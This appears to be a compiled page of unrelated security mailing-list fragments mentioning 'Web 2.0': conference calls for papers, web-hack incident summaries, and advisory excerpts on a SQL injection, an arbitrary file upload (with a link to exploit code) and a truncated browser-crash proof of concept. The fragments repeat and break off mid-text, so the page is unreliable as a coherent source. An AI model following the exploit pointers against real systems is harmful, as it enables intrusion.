Next Page >>
Web 2.0
> Google *.google.com apps, webmail, etc.) cookies are an easy and
> transparent way to fly, that work now, all the time, and have clear
> business drivers behind them for auth tracking (and working now, all
> the time).
>
> Many modern web 2.0 products use cookies for auth = tracking, not auth
> = confidentiality.
I never said cookies should go away. I merely want cookies to stop
being used for managing authenticated sessions in most applications.
Some applications may still require that flexibility, however, and for
Watcher is a runtime passive-analysis tool for HTTP-based Web applications.
It complements static code analysis and manual security reviews by providing
painless verification of operational and code-level issues at runtime.
Watcher works seamlessly with today’s complex Web 2.0 applications by
running silently in the background while you drive your browser and interact
with the Web-application.
It is being released for free under an Open Source license, the binaries and
source are available through CodePlex at
http://websecuritytool.codeplex.com/. A screenshot of the reporting screen
(http://whid.xiom.com/whid-2009-3)
A very good example of why insufficient anti-automation is becoming
a major threat to web applications.
* WHID 2009-4: Twitter Personal Info CSRF (http://whid.xiom.com/whid-2009-4)
If you thought Web 2.0 was dangerous, but didn't know just how (or
what Web 2.0 is...), this incident is your answer.
* WHID 2009-5: School data hacked, grades altered
(http://whid.xiom.com/whid-2009-5)
Every student's dream comes true.
• Linux
Mobile Devices/Embedded systems
• SmartPhones
• PDAs
• Game Consoles
Web 2.0
• Web services
• PHP
• .Net
• Web applications
Networking/Telecommunication
Topics Range (but unlimited):
--- Security in new fields
- Vista / Windows
- Web 2.0
- 3G/4G network
- Mobile Handset (Symbian / IPhone / Android / Windows Mobile )
- Banks & Financial institutes
- Business Information System
- Virtualization
We have published a preliminary schedule which can be found on our web site:
https://deepsec.net/schedule/
The topics include social engineering, security of the GSM air interface,
design of secure protocols, physical security, Web 2.0, exploit/malware
analysis & design, security awareness, abusing device drivers, #twitter
risks, attacks on smart-card secured online banking, security risks and
defence for developers, advanced database exploits, abusing firmware,
security analysis of the TCP & IP protocols, key management, incident
response, e-voting, advanced keyboard sniffing, malware for routers,
https://www.owasp.org/index.php/OWASP_Israel_2007_Conference#Program)
Cross Site Request Forgery - Overview and Solutions
Ofer Shezaf, OWASP IL chapter leader, Breach Security
Defeating Web 2.0 Attacks without Recoding Applications
Amichai Shulman, CTO, Imperva
Harvesting Skype Super-Nodes
Omer Dekel, IDC
SMAU, Italy's largest ICT tradeshow.
The conference will consist of two days of top notch trainings and one
day of bleeding edge talks. Topics of presentations this year include
but are not limited to OSX security, hardware hacking, SAP exploiting,
web 2.0 threats and malware analysis.
Aside from highly technical presentations we are pleased to have a
roundtable and a number of talks focusing on the economic aspect of
cybersecurity, brought to you by well known cybersecurity and cybercrime
experts. To read the full line-up of speakers please see:
Introduction
------------
An AJAX based Blind SQL Injection vulnerability exists in
the Web 2.0 CMS framework Urulu [1]. A remote, anonymous
attacker can retrieve arbitrary data from the SQL database.
In addition, depending on the database setup, an attacker
may upload and execute arbitrary PHP code.
If I understand the process, saving the text at [IV. Proof of concept] (following the "~~~..." to an .XHTML file, and launch the file using Firefox, I should lose functionality ("Browser doesn't respond any longer to any user input, all tabs are no longer accessible, your work if any (hail to the web 2.0) might be lost.")
Using FF2.0.0.20 and the file does not result in loss of use. All tabs are functional. All JAVA links continue function. Same result for naming the POC file to .HTML, .HTM.
>>> Thierry Zoller <Thierry@Zoller.lu> 05/26/2009 13:13 >>>
For those that failed to reproduce, try naming the POC file with an XHTML
extension.
through iFrame attack
(http://whid.xiom.com/whid/2009/12/embassy-of-india-in-spain-found-serving-r
emote-malware-through-iframe)
It is interesting to note that everything of interest seem to evolve around
"Web 2.0" sites. On another note, the Heartland incident we queried about
last week seems not to be related to web hacking
(http://whid.xiom.com/whid-Is_the_new_Monster_Hack_a_Web_Hack)
~ Ofer
JP> If I understand the process, saving the text at [IV. Proof of
JP> concept] (following the "~~~..." to an .XHTML file, and launch the
JP> file using Firefox, I should lose functionality ("Browser doesn't
JP> respond any longer to any user input, all tabs are no longer
JP> accessible, your work if any (hail to the web 2.0) might be lost.")
JP> Using FF2.0.0.20 and the file does not result in loss of use.
JP> All tabs are functional. All JAVA links continue function. Same
JP> result for naming the POC file to .HTML, .HTM.
>
> Topics include (but not limited to):
>
> --- Security in new fields
> - Vista
> - Web 2.0
> - 3G/4G network
> - Mobile Handset
> - Banks & financial institutes
> - GRPS & CDMA
> - Routing device
Track 3: New Technologies & services
------------------------------------
- New generation Internet, Post IP and IPv6
- NGN architectures, protocols and services management and delivery
- Web 2.0 applications and IMS (IP Multimedia Subsystems)
- Next generation systems & Service-oriented techniques
- IPTV and content distribution networks
- User-centric networking and services
- multimedia indexing and retrieval
- Personalized access to media systems
Industrial Networking
Security in Carrier Environments
Secure Coding
If you think your talk could be appropriate for the "Defend Track" feel free to apply for that one. Be aware the audience will be different from the one you have at - say - CCC (and we've very few speaker slots left there, too). Of course you can apply for a sole late-night talk as well. Note that - given the attractiveness of Munich's night life - you might have a very small audience there.
Obviously heavy vendor-pitching will not be welcomed warmly and we reserve the right to ask for modifications of confirmed talks if we have the impression there's too much of that in a talk. If you have to offer another "Web 2.0 cross browser unicode overflow" talk you may submit it. However chances will be bigger if you have some more innovative stuff to talk about...
CFP submissions must include the following information:
Background:
===========
Websense Email Security software incorporates multiple layers of
real-time Web security and data security intelligence to provide
leading email protection from converged email and Web 2.0 threats.
It helps to manage outbound data leaks and compliance risk, and enables
a consolidated security strategy with the trusted leader in Essential
Information Protection.
(Product description from Websense Website)
Background:
===========
Websense Email Security software incorporates multiple layers of
real-time Web security and data security intelligence to provide
leading email protection from converged email and Web 2.0 threats.
It helps to manage outbound data leaks and compliance risk, and enables
a consolidated security strategy with the trusted leader in Essential
Information Protection.
(Product description from Websense Website)
http://www.ibwas.com
Call for Papers
Introduction
There is a change in the information systems development paradigm. The emergence of Web 2.0 technologies led to the extensive deployment and use of web-based applications and web services as a way to developed new and flexible information systems. Such systems are easy to develop, deploy and maintain and demonstrate impressive features for users, resulting in their current wide use.
As a result of this paradigm shift, the security requirements have also changed. These web-based information systems have different security requirements, when compared to traditional systems. Important security issues have been found and privacy concerns have also been raised recently. In addition, the emerging Cloud Computing paradigm promises even greater flexibility; however corresponding security and privacy issues still need to be examined. The security environment should involve not only the surrounding environment but also the application core.
This conference aims to bring together application security experts, researchers, educators and practitioners from the industry, academia and international communities such as OWASP, in order to discuss open problems and new solutions in application security. In the context of this track academic researchers will be able to combine interesting results with the experience of practitioners and software engineers.
Conference Topics
Suggested topics for papers submission include (but are not limited to):
Ÿ Games Consoles
Ÿ E-Readers
*6. **Web 2.0 **
* • Web services
• PHP
• .Net/.asp
• Web applications
Introduction
============
"Feature complete yet easy to use, WebMail Server Pro provides feature
rich Web 2.0 web-based access to email, calendars, contacts, files and
shared data from any computer with browser and internet connection,
without the usual configuration hassle. Thanks to advanced technologies
and application-like look and feel, Pro suggests it was born to become the
ultimate replacement of Outlook and similar desktop mail clients."
6th & 7th October 2010
* HITB TRAINING 2 - Advanced Exploit Lab
11th & 12th October 2010
* TECH TRAINING 1 - Web 2.0 Hacking - Advanced Attacks and Defense (Ajax, RIA and SOA)
* TECH TRAINING 2 - Network Endpoint Visibility: Digging Deeper
* TECH TRAINING 3 - SAP Security In-Depth
* TECH TRAINING 4 - Hunting Web Attackers
Date: October 13th - Conf Day 1
In-portal is prone to a remote arbitrary file-upload vulnerability
This issue may allow remote attackers to upload arbitrary files, including malicious scripts, and possibly to execute a script on the affected server.
In-portal Web 2.0 CMS v5.0.3 is affected by this issue. Other or lowers versions may be vulnerable as well.
Reports indicate that this issue is being exploited in the wild.
The following exploit code is available:
http://inj3ct0r.com/exploits/11949
Topics Range (but unlimited):
--- Security in new fields
- Vista / Windows
- Web 2.0
- 3G/4G network
- Mobile Handset (Symbian / IPhone / Android / Windows Mobile )
- Banks & Financial institutes
- Business Information System
- Virtualization
600715e0 660f122550450960 movlpd xmm4,qword ptr [MOZCRT19!exception::`vftable'+0x1a3d8 (60094550)] ds:0023:60094550=3fe62e42fefa39ef
III. Impact
~~~~~~~~~~~
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any (hail to the web 2.0) might be lost.
IV. Proof of concept (hold your breath)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html xmlns='http://www.w3.org/1999/xhtml'>
<head>
Introduction
============
"Feature complete yet easy to use, WebMail Server Pro provides feature
rich Web 2.0 web-based access to email, calendars, contacts, files and
shared data from any computer with browser and internet connection,
without the usual configuration hassle. Thanks to advanced technologies
and application-like look and feel, Pro suggests it was born to become
the ultimate replacement of Outlook and similar desktop mail clients."
Track 3: New Technologies & services
------------------------------------
- New generation Internet, Post IP and IPv6
- NGN architectures, protocols and services management and delivery
- Web 2.0 applications and IMS (IP Multimedia Subsystems)
- Next generation systems & Service-oriented techniques
- IPTV and content distribution networks
- User-centric networking and services
- multimedia indexing and retrieval
- Personalized access to media systems
Introduction
============
"Feature complete yet easy to use, WebMail Server Pro provides feature
rich Web 2.0 web-based access to email, calendars, contacts, files and
shared data from any computer with browser and internet connection,
without the usual configuration hassle. Thanks to advanced technologies
and application-like look and feel, Pro suggests it was born to become
the ultimate replacement of Outlook and similar desktop mail clients."
* WHID 2009-11: Lil Kim Facebook Hacked
(http://whid.xiom.com/WHID/2009/11/Lil_Kim_Facebook_Hacked):
Together with the Soulja Boy Incident last year
(http://whid.xiom.com/WHID/2008/56/Soulja_Boy_Myspace_Hacked) and the
Twitter hack earlier this month (http://whid.xiom.com/whid-2009-2) shows
that inherent insecurity of Web 2.0 due to mismanagement by the (often
hi-profile) users.
* WHID 2009-10: MacRumorsLive feed hack
(http://whid.xiom.com/WHID/2009/10/MacRumorsLive_feed_hacked)
* WHID 2009-8: Wired.com Image Viewer Hacked to Create Phony Steve Jobs
Btw, according to Bugtrag (http://www.securityfocus.com/bid/25849/exploit)
an attacker must convince the victim into subscribing a malicious RSS feed.
As I've already discussed this in my blog post
(http://aviv.raffon.net/2007/08/16/VistaGadgetsGoneWild.aspx) regarding the
Windows Vista's RSS gadget, this claim is not true. In today's Web2.0 era,
if a remote code execution vulnerability exists in RSS readers, it is very
easy to create an RSS based worm.
--Aviv.
>>
>> Topics include (but not limited to):
>>
>> --- Security in new fields
>> - Vista
>> - Web 2.0
>> - 3G/4G network
>> - Mobile Handset
>> - Banks & financial institutes
>> - GRPS & CDMA
>> - Routing device
Next Page>>
|
